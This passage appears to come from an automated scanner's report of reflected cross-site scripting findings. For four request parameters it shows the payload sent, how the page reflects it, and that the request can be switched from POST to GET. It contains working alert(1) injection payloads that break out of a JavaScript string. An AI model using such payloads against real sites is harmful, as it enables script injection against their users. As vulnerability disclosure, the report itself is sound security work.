The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
The value of the program_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824bc"%3balert(1)//faa69d1e4cac8c868 was submitted in the program_type parameter. This input was echoed as 824bc";alert(1)//faa69d1e4cac8c868 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
The value of the program_type2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d8f"%3balert(1)//b75aa6850b1597960 was submitted in the program_type2 parameter. This input was echoed as c5d8f";alert(1)//b75aa6850b1597960 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
The value of the registered_nurse request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e90f"%3balert(1)//35db81cf6d89d4995 was submitted in the registered_nurse parameter. This input was echoed as 2e90f";alert(1)//35db81cf6d89d4995 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.
The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b8d"%3balert(1)//b06b0eb551423d5a9 was submitted in the state parameter. This input was echoed as d2b8d";alert(1)//b06b0eb551423d5a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript